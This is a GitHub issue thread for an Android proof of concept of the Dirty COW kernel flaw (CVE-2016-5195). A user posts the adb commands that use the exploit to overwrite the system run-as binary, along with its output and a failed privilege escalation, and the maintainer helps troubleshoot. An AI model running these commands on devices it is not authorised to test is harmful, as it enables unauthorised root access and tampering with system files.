timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android

RUN, get problems, need help!!! #38

Open xiaoli689 opened 7 years ago

xiaoli689 commented 7 years ago

adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
WARNING: linker: /data/local/tmp/dirtycow: unused DT entry: type 0x6ffffffe arg 0x5f8
WARNING: linker: /data/local/tmp/dirtycow: unused DT entry: type 0x6fffffff arg 0x1
warning: new file size (13708) and file old size (9440) differ

size 13708

[] mmap 0xb63fc000
[] exploit (patch)
[] currently 0xb63fc000=464c457f
[] madvise = 0xb63fc000 13708
[] madvise = 0 1048576
[] /proc/self/mem 0 1048576
[*] exploited 0xb63fc000=464c457f
adb shell /system/bin/run-as
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6ffffffe arg 0x4fc
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6fffffff arg 0x1
running as uid 2000
Could not set capabilities: Operation not permitted
setresgid/setresuid failed
uid 2000

timwr commented 7 years ago

Which device is this? run-as has issues on the Galaxy S4 (and some other phones, I think). The phone is still vulnerable, however.

xiaoli689 commented 7 years ago

@timwr I think you are right. Perhaps the problem is the compiler environment.

timwr commented 7 years ago

It's not the compiler environment. You can confirm the device is vulnerable with make test. I suspect you're seeing this issue: https://code.google.com/p/android/issues/detail?id=58373